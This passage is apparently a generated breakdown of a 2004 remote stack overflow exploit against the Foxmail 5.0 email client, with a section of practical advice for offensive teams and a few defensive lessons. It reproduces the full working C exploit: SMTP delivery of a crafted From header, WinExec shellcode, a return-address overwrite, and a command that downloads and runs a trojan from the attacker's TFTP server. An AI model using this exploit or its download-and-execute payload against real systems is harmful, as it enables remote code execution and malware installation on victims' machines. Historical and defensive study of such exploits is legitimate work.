"From: %s\r\n": This is the critical part. The %s is a format string placeholder that will be replaced by the attacker-controlled buffer containing the overflow data. This is where the vulnerability is triggered.
The rest of the packet defines a multipart MIME email. This structure is used to embed different types of content, including an attachment (girl.htm). The multipart/mixed type is often used to send various parts of an email, and the Content-Disposition: attachment header indicates that one part should be treated as an attachment.

`winexec` and `winexec2` - Shellcode

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

These are small pieces of machine code (shellcode).

Purpose: The comments indicate these shellcodes are designed to call the WinExec() function. WinExec() is a Windows API function that executes a specified command.
Difference: winexec is for Foxmail 5.0.300, and winexec2 is for Foxmail 5.0.210 BETA2. This suggests that the exact address of WinExec() within the Foxmail.exe module differs between these versions, and the shellcode needs to be tailored to find that address.
Content: The byte sequences are raw machine instructions. Without a disassembler, it's hard to know the exact sequence of operations, but the goal is to locate and call WinExec. The exploit likely uses a technique to find the address of WinExec within the loaded Foxmail.exe module in memory. The structure \x83\xec\x50 often relates to stack frame setup. \xeb\x0c is a short jump. The subsequent bytes are likely instructions to find the WinExec address and then call it.

`Make_Connection` Function

int  Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf); // Set socket to non-blocking mode
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target)); // Initiate connection
    if((i=select(s+1,0,&wd,0,&tv))==(-1)) // Wait for connection or timeout
    {
        closesocket(s);
        return -3;
    }
    if(i==0) // Timeout
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); // Check for connection errors
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf); // Restore blocking mode (or keep non-blocking if bf is 1)
    return s;
}

Purpose: This function establishes a TCP connection to a specified IP address and port with a given timeout. It's used to connect to the SMTP server.
socket(AF_INET, SOCK_STREAM, 0): Creates a TCP socket.
inet_addr(address): Converts an IP address string to a network byte order integer.
htons(port): Converts a port number to network byte order.
ioctlsocket(s, FIONBIO, &bf): Sets the socket to non-blocking mode. This allows the connect call to return immediately if the connection isn't established, and select is used to wait for the connection to complete.
connect(): Attempts to establish the connection.
select(): A system call that monitors multiple file descriptors (sockets in this case) for readiness. Here, it's used to wait for the connect operation to complete or to time out.
getsockopt(): Used to retrieve the error status of the socket after connect and select.
Return Value: Returns the socket descriptor on success, or negative error codes indicating different failure reasons.

`SendXMail` Function

//send magic mail
int  SendXMail(    char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET  csock;
    int     ret,i=0;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    csock = Make_Connection(smtpserver, SMTPPORT, 10); // Connect to SMTP server
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    // --- SMTP Handshake ---
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive banner
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf); // Print server response

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0); // Send HELO command
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive HELO response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);

    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0); // Send MAIL FROM
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive MAIL FROM response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr); // Construct RCPT TO command
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive RCPT TO response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    Sleep(1000); // Small delay
    
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0); // Send DATA command
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive DATA response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);

    // --- Exploit Payload Construction ---
    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf)); // Clear main buffer for email body
    memset(buf, 0, sizeof(buf));   // Clear temporary buffer
    memset(buf, 0x41, sizeof(buf)-1); // Fill buffer with 'A's (for overflow)
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec); // This line is commented out, using shellcode parameter instead
    strcpy(tmp, shellcode); // Copy the provided shellcode
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:"); // Append command to download and run a.exe via TFTP
    sprintf(tmp1, tmp, tftp); // Format the command with the TFTP server IP
    
    // This is the core of the overflow. The 'buf' is filled with 'A's, and the crafted command is placed at an offset.
    // The offset 0x100 is chosen to land within the vulnerable buffer in PunyLib.dll.
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1)); // Place the command string at a specific offset within the 'buf'
    
    // Overwriting return address and other stack data
    *(int *)(buf+0x100)=0x7ffa54cd;  // Overwrite return address with a pointer to ESP (likely to point to shellcode)
    *(int *)(buf+0x104)=0x80eb80eb;  // Junk/NOP sled or jump instructions
    *(int *)(buf+0x108)=0x7ffdf220;  // Another address, possibly a writable memory location
    *(int *)(buf+0x110)=0x7ffdf220;  // Another address, possibly a writable memory location
    
    memcpy(buf, "girl\x0d", 5); // Prepend some data to the buffer, possibly to align or trigger specific parsing
    sprintf(sbuf, (char *)packet, buf); // Format the email body with the crafted buffer

    ret=send(csock, sbuf,strlen(sbuf), 0); // Send the crafted email
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive final server response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock); // Close the connection
    return 0;
}

Purpose: This function orchestrates the sending of the malicious email via SMTP.
SMTP Handshake: It first establishes a connection to the SMTP server using Make_Connection. Then, it performs a standard SMTP handshake:
- Receives the server's greeting banner.
- Sends HELO server\r\n.
- Receives the server's response.
- Sends MAIL FROM: info@sina.com\r\n.
- Receives the response.
- Constructs and sends RCPT TO: <victim_email>\r\n.
- Receives the response.
- Sends DATA\r\n to indicate the start of the email body.
- Receives the response.
Exploit Payload Construction:
- memset(buf, 0x41, sizeof(buf)-1);: This line is crucial. It fills a buffer (buf) with the character 'A' (hex 0x41). This buffer is intended to be the data that overflows.
- strcpy(tmp, shellcode);: The provided shellcode (either winexec or winexec2) is copied into a temporary buffer tmp.
- strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");: The shellcode is appended with a command string. This command tells the victim's machine to:
  - cmd /c: Execute the following command and then terminate.
  - tftp -i %s get a.exe: Use TFTP in binary mode (-i) to download a file named a.exe from the specified TFTP server (%s will be replaced by the tftp argument).
  - &a.exe:: After downloading, execute the a.exe file. The colon at the end might be a typo or intended for a specific execution context.
- sprintf(tmp1, tmp, tftp);: The tftp server IP address is inserted into the command string.
- memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));: This places the crafted command string into the buf buffer. The offset 0x100 - strlen(tmp1) is calculated to position the command string such that it will be part of the data that overwrites the stack. The 0x100 offset is significant as it's likely the point where the overflow begins to overwrite the return address.
- *(int *)(buf+0x100)=0x7ffa54cd;: This line overwrites what is expected to be the return address on the stack. 0x7ffa54cd is a memory address. In this context, it's likely an address pointing to the shellcode or a location that will lead to its execution. The value 0x7ffa54cd is specific to the target environment and might be an address of WinExec or a JMP ESP instruction within Foxmail.exe or a loaded DLL.
- *(int *)(buf+0x104)=0x80eb80eb;: These are likely padding or jump instructions. 0xeb80 is a short jump instruction.
- *(int *)(buf+0x108)=0x7ffdf220; and *(int *)(buf+0x110)=0x7ffdf220;: These are other overwritten stack locations, possibly pointing to writable memory or used for further control flow manipulation.
- memcpy(buf, "girl\x0d", 5);: This prepends "girl\r" to the buffer. This might be to trigger specific parsing logic in Foxmail or to pad the buffer.
- sprintf(sbuf, (char *)packet, buf);: The entire crafted buffer (buf) is inserted into the From: field of the email template (packet).
- send(csock, sbuf,strlen(sbuf), 0);: The complete, malicious email is sent.
- The function then receives the final SMTP response and closes the connection.

`main` Function

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;

    if(argc!=4)
    {
        printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>\ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n", argv[0], argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, winexec);  //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, winexec2);  //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

    WSACleanup();

    return 0;
}

Purpose: This is the entry point of the program. It parses command-line arguments, initializes the Windows Sockets library, calls SendXMail twice (once for each shellcode version), and then cleans up.
Argument Parsing: It checks if exactly three arguments are provided: the target email address, the TFTP server IP, and the SMTP server IP.
WSAStartup(MAKEWORD(1,1), &WSAData): Initializes the Windows Sockets API. This must be called before any other socket functions.
SendXMail(mailaddr, tftp, smtpserver, winexec);: Calls SendXMail with the first shellcode (winexec). This attempts to exploit Foxmail 5.0.300.
SendXMail(mailaddr, tftp, smtpserver, winexec2);: Calls SendXMail again with the second shellcode (winexec2). This attempts to exploit Foxmail 5.0.210 BETA2. The exploit tries both in case the user has either version.
WSACleanup(): Cleans up the Windows Sockets API resources.

Code Fragment/Block -> Practical Purpose Mapping

#include <windows.h>: Access to Windows API functions like socket, connect, send, recv, WSADATA, WSAStartup, WSACleanup, ioctlsocket, select, Sleep.
#pragma comment (lib,"ws2_32"): Links the network library.
unsigned char packet[]: Defines the email template, including the vulnerable From: field.
unsigned char winexec[], unsigned char winexec2[]: The machine code payload that will be executed on the victim.
main(): Entry point, argument parsing, socket initialization/cleanup, orchestrates exploit calls.
Make_Connection(): Establishes a TCP connection to the SMTP server.
SendXMail():
- SMTP handshake logic: HELO, MAIL FROM, RCPT TO, DATA.
- Buffer preparation (memset(buf, 0x41, ...)): Creates the overflow data.
- Shellcode and command injection (strcpy(tmp, shellcode), strcat(tmp, "cmd /c tftp...")): Combines the shellcode with the TFTP download command.
- Payload placement (memcpy(buf+0x100-strlen(tmp1), tmp1, ...)): Inserts the crafted command into the overflow buffer at a specific offset.
- Return address overwrite (*(int *)(buf+0x100)=0x7ffa54cd;): Redirects execution flow.
- Email formatting (sprintf(sbuf, (char *)packet, buf);): Integrates the overflow buffer into the email.
- Sending the email (send(csock, sbuf, ...)): Transmits the malicious email.

Practical details for offensive operations teams

Required Access Level: Network access to the target's SMTP server (if the target is configured to relay mail through an external server) or direct network access to the target's machine if the exploit were to be delivered via a local file or other means (though this exploit is remote). The primary vector is sending an email.
Lab Preconditions:
- A vulnerable Foxmail 5.0 client installed on a test machine.
- A functional SMTP server that allows relaying from the attacker's IP or an internal network.
- A TFTP server set up by the attacker, hosting a malicious executable named a.exe. This a.exe would typically be a trojan or backdoor.
- The attacker needs to know the target's email address and the IP address of the SMTP server.
Tooling Assumptions:
- A C compiler (like Microsoft Visual C++ cl.exe) to compile the exploit code.
- A TFTP server implementation (e.g., Tftpd32, or a Linux tftpd-hpa).
- A malicious executable (a.exe) prepared beforehand.
Execution Pitfalls:
- SMTP Server Restrictions: Many SMTP servers have anti-spam measures, including IP blacklisting, sender verification, and content filtering, which could prevent the email from being delivered or processed.
- Foxmail Version Mismatch: The exploit is specific to Foxmail 5.0.300.0 and 5.0.210 BETA2. Different versions or patches would likely render the exploit ineffective. The hardcoded addresses in the shellcode are highly version-dependent.
- Address Space Layout Randomization (ASLR) / Data Execution Prevention (DEP): While ASLR and DEP were less prevalent or robust in 2004, modern systems would likely have protections that could prevent the shellcode from executing or the exploit from succeeding. The hardcoded return address 0x7ffa54cd is a prime target for these defenses.
- Network Latency/Reliability: Unreliable network connections could cause the SMTP transaction to fail.
- TFTP Server Availability: The TFTP server must be accessible from the victim's machine. Firewalls could block TFTP traffic (UDP port 69).
- a.exe Execution: The victim's operating system or antivirus software might prevent a.exe from running.
Telemetry:
- SMTP Server Logs: Outgoing email traffic from the attacker's IP to the target SMTP server. Successful delivery of the email.
- TFTP Server Logs: Incoming TFTP connection requests from the victim's IP, and successful download of a.exe.
- Victim Machine:
  - Network traffic to the attacker's TFTP server.
  - Execution of a.exe (if not blocked by AV).
  - Potential process creation events for cmd.exe and tftp.exe.
  - Antivirus alerts if a.exe is detected.
  - Unusual network activity originating from the victim machine if a.exe is a backdoor.
- Exploit Tool Output: The C program will print SMTP server responses and status messages.

Where this was used and when

Context: This exploit was developed and published in 2004. At that time, Foxmail was a popular email client, particularly in Asia.
Usage: The exploit was designed for remote code execution against Foxmail users. The authors explicitly mention it was used to "hack" email addresses. The use of TFTP suggests a common method for delivering trojans in that era. It's likely this exploit was used in targeted attacks or as part of broader email-based malware campaigns.

Defensive lessons for modern teams

Patch Management: The most critical lesson is the importance of keeping software, especially email clients and their associated libraries, up-to-date. This vulnerability was patched long ago.
Email Security Gateways: Modern email security solutions can detect and block malicious attachments, suspicious MIME structures, and exploit attempts embedded in email content.
Network Segmentation and Firewalls: Restricting outbound TFTP traffic (UDP 69) from client machines can prevent the download of malicious payloads.
Endpoint Detection and Response (EDR): EDR solutions can detect the execution of a.exe or the cmd.exe process spawned by the exploit, even if the initial email delivery is successful.
Application Whitelisting: Preventing unauthorized executables like a.exe from running on endpoints.
Understanding Protocol Usage: TFTP is an insecure protocol and should be restricted or disabled on client networks unless absolutely necessary.
Secure Coding Practices: Developers must be aware of buffer overflow vulnerabilities and implement robust input validation and bounds checking.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a specific vulnerability within the client. A simplified flow can be visualized:

+-----------------+       +-----------------+       +-----------------+
| Attacker's      | ----> | SMTP Server     | ----> | Victim's        |
| Machine         |       | (Relay/Internal)|       | Foxmail Client  |
| (Runs Exploit)  |       +-----------------+       +-----------------+
+-----------------+                                         |
        |                                                   | (Vulnerable
        | Sends Malicious Email                             |  PunyLib.dll)
        |                                                   v
        |                                         +-----------------+
        |                                         | Stack Overflow  |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Redirects to
        |                                                   | Shellcode
        |                                                   v
        |                                         +-----------------+
        |                                         | Shellcode       |
        |                                         | (Executes TFTP |
        |                                         |  command)       |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Connects to
        |                                                   | Attacker's
        |                                                   | TFTP Server
        |                                                   v
        |                                         +-----------------+
        |                                         | Attacker's      |
        | <---------------------------------------| TFTP Server     |
        |   (Sends a.exe)                         | (Hosts a.exe)   |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Victim executes a.exe
        |                                                   v
        |                                         +-----------------+
        |                                         | Malicious       |
        |                                         | Executable      |
        |                                         | (a.exe)         |
        |                                         +-----------------+

Source references

Paper: Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
Author: xfocus
Published: 2004-03-23
Exploit-DB URL: https://www.exploit-db.com/papers/164
Raw Exploit URL: https://www.exploit-db.com/raw/164

Original Exploit-DB Content (Verbatim)

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author   : xfocus <webmaster@xfocus.org>
*          : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version  : 0.2
*
* Test     : Windows 2000 server GB/XP professional
*                + Foxmail 5.0.300.0
* Notes    : unpublished vul.
* Greets   : all member of XFOCUS Security Team.
* Complie  : cl fmx.c
* Usage    : fmx <mail_addr> <tftp_server> <smtp_server>
*             mail_addr: email address we wantto hack
*             tftp_server: run a tftp server and have a a.exe trojan
*             smtp_server: SMTP server don't need login, we send the email thru it
*
* Date     : 2004-02-27
* Revised  : 2004-03-05
*
* Revise History:
* 2003-03-05  call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
"  name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"<html></html>\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

#define SMTPPORT 25
int  Make_Connection(char *address,int port,int timeout);
int  SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;

    if(argc!=4)
    {
        printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>\ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n", argv[0], argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, winexec);  //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, winexec2);  //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

    WSACleanup();

    return 0;
}

//  ½¨Á¢TCPÁ¬½Ó
//  ÊäÈë:
//       char * address  IPµØÖ·
//       int  port       ¶Ë¿Ú
//       int  timeout    ÑÓÊ±
//  Êä³ö:
//  ·µ»Ø:
//       ³É¹¦ >0
//       ´íÎó <=0    

int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

//send magic mail
int  SendXMail(    char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET  csock;
    int     ret,i=0;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    csock = Make_Connection(smtpserver, SMTPPORT, 10);
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    Sleep(1000);
    
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
    sprintf(tmp1, tmp, tftp);
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    *(int *)(buf+0x100)=0x7ffa54cd;  //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb;  //jmp back
    *(int *)(buf+0x108)=0x7ffdf220;  //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220;  //writeable addr
    memcpy(buf, "girl\x0d", 5);
    sprintf(sbuf, (char *)packet, buf);

    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock);
    return 0;
}

// milw0rm.com [2004-03-23]

Foxmail 5.0 PunyLib.dll Remote Stack Overflow Explained

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

fmx.c - Header and Includes

packet - Email Body Structure

winexec and winexec2 - Shellcode

Make_Connection Function

SendXMail Function

main Function

Code Fragment/Block -> Practical Purpose Mapping

Practical details for offensive operations teams

Where this was used and when

Defensive lessons for modern teams

ASCII visual (if applicable)

Source references

Original Exploit-DB Content (Verbatim)

Foxmail 5.0 PunyLib.dll Remote Stack Overflow Explained

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

fmx.c - Header and Includes

packet - Email Body Structure

winexec and winexec2 - Shellcode

Make_Connection Function

SendXMail Function

main Function

Code Fragment/Block -> Practical Purpose Mapping

Practical details for offensive operations teams

Where this was used and when

Defensive lessons for modern teams

ASCII visual (if applicable)

Source references

Original Exploit-DB Content (Verbatim)

`fmx.c` - Header and Includes

`packet` - Email Body Structure

`winexec` and `winexec2` - Shellcode

`Make_Connection` Function

`SendXMail` Function

`main` Function

`fmx.c` - Header and Includes

`packet` - Email Body Structure

`winexec` and `winexec2` - Shellcode

`Make_Connection` Function

`SendXMail` Function

`main` Function